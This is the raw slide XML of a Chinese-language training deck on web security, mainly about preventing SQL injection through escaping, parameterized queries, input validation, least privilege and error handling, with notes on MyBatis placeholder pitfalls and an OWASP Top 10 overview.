              <a:t>等）进行转义处理，例如将用户输入的数据中的一些特殊字符转义为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实体，或编码转换。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>转义字符可以有效地防止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入攻击，但是在使用时需要注意以下几点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>转义字符必须放在需要转义的特殊字符前面，否则会导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句执行失败。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不要过度使用转义字符，否则会使</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句难以阅读和维护。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4078381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7848302"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为了有效地防范</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入漏洞，以下是一些重要的安全措施和最佳实践：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用参数化查询或预编译语句：参数化查询可以防止恶意用户直接插入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>代码。使用绑定参数和预编译语句，将用户输入的数据作为参数传递给查询，而不是将其直接拼接到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句中。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>严格验证和过滤输入：对于所有的用户输入，进行严格的验证和过滤。确保输入数据符合预期的格式、长度和类型。可以使用白名单验证、正则表达式或特定的输入验证库来实现。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>最小权限原则：在数据库设置中，为应用程序使用的数据库用户分配最小的权限。只授予应用程序所需的最低权限，以限制攻击者对数据库的潜在影响。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用安全编码实践：采用安全的编程实践，如避免动态拼接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查询字符串、使用安全的字符转义函数、避免将敏感信息明文存储在数据库中等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>安全错误处理：避免将详细的错误信息直接显示给用户，特别是在生产环境中，应避免网站打印出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语句暴露出来。确保错误信息仅记录在日志文件中，而不是暴露给用户，以防止攻击者利用错误信息来进一步利用漏洞。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41955247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58783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
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 233"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466131" y="2316480"/>
            <a:ext cx="20697517" cy="263997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3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4783772" y="6299000"/>
            <a:ext cx="11919268" cy="6225117"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Shape 238">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{939E5F80-3AEB-0930-A548-3ADA4C0B3309}"/>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3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466132" y="3747960"/>
            <a:ext cx="20009018" cy="2408284"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466131" y="6858000"/>
            <a:ext cx="20009019" cy="3769360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Shape 238">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F465FD5-900A-60B5-B7E8-3707DA6F049E}"/>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3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3207568" y="6365802"/>
            <a:ext cx="17968863" cy="5247544"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Shape 238">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{024CE5A2-36EE-DF85-801E-CFDA51AAB166}"/>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3.1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>未使用占位符</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </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p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>​ 解决方法为遍历传入的 对象个数，使用“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>?”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>占位符。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3.3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>like</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句</a:t>
            </a:r>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAD7356C-5CDF-5E15-85E9-2AAFC26EFC57}"/>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3.4.%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_</a:t>
            </a:r>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p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3.5.Order by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Group by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等无法预编译</a:t>
            </a:r>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p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>预编译主要是用于固定部分的查询语句，而不能涉及到动态的部分。在这些动态的情况下，可以考虑使用参数化查询，并通过将动态的部分作为参数进行绑定来提高安全性和性能。</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51378F64-7F7F-033F-4B2F-0630F0A04D09}"/>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
        <p:nvSpPr>
          <p:cNvPr id="2" name="Shape 238">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{838A0AFF-BDB4-1545-81EE-8CAB91399B30}"/>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
        <p:nvSpPr>
          <p:cNvPr id="2" name="Shape 238">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5755D11-BFBB-229A-7371-A0BB2EC5CC81}"/>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3247877"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>（开放式</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应用程序安全项目）是一个开源的、非营利性的全球性安全组织，致力于改进</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应用程序的安全，这个组织最出名是，它总结了</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种最严重的</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应用程序安全风险，这就是著名的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>OWASP Top 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>。</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>包括：注入、失效身份验证和会话管理、敏感信息泄露、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>外部实体注入攻击（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>）、存取控制中断、安全性错误配置、跨站脚本攻击（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>）、不安全的反序列化、使用具有已知漏洞的组件、日志记录和监控不足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356" y="5353879"/>
            <a:ext cx="15329288" cy="720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oracle:</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
        <p:nvSpPr>
          <p:cNvPr id="2" name="Shape 238">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9276BE5-BCF0-2998-CBEC-EF7F846CB9ED}"/>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
        <p:nvSpPr>
          <p:cNvPr id="2" name="Shape 238">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3E64B8B-D1D4-B122-0573-80B862978C6B}"/>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0" y="2425502"/>
            <a:ext cx="22096730" cy="957185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是一个开源的对象关系映射框架，它对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names);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Shape 238">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{309EA3E5-A3AD-5EA3-81F2-3C66A278C8FA}"/>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user1.setName("g1ts");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注入，正确写法：</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
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 238">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE03C39C-D943-0283-BA4C-C8466E16B0C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466132" y="400308"/>
            <a:ext cx="947242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85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Web</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>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65000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>SQL</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="65000"/>
                      </a:schemeClr>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1318259528"/>
      </p:ext>
    </p:extLst>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2798814" y="1072484"/>
            <a:ext cx="5073565" cy="1413616"/>
            <a:chOff x="-1" y="133127"/>
            <a:chExt cx="5073564" cy="1413614"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="76" name="Group 184"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-1" y="133127"/>
              <a:ext cx="5073564" cy="1122683"/>
              <a:chOff x="-1" y="133128"/>
              <a:chExt cx="5073564"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漏洞原理</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2811076" y="7395316"/>
            <a:ext cx="5140892" cy="1413616"/>
            <a:chOff x="-1" y="133127"/>
            <a:chExt cx="5140892" cy="1413614"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="66" name="Group 196"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-1" y="133127"/>
              <a:ext cx="5140892" cy="1046436"/>
              <a:chOff x="-1" y="133128"/>
              <a:chExt cx="5140892" cy="1046434"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="68"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4</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="69" name="Shape 194"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1894491" y="294360"/>
                <a:ext cx="3246400"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漏洞实例</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2798814" y="5247611"/>
            <a:ext cx="7327388" cy="1413616"/>
            <a:chOff x="-1" y="133127"/>
            <a:chExt cx="7327388" cy="1413614"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="61" name="Group 202"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-1" y="133127"/>
              <a:ext cx="7327388" cy="1046436"/>
              <a:chOff x="-1" y="133128"/>
              <a:chExt cx="7327388" cy="1046434"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="63" name="Shape 199"/>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3</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="64" name="Shape 200"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1894491" y="294360"/>
                <a:ext cx="5432896"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XML</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>文档中的</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>DTD</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>介绍</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2811076" y="11522978"/>
            <a:ext cx="4047645" cy="1413616"/>
            <a:chOff x="-1" y="133127"/>
            <a:chExt cx="4047644" cy="1413614"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="18" name="Group 196"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
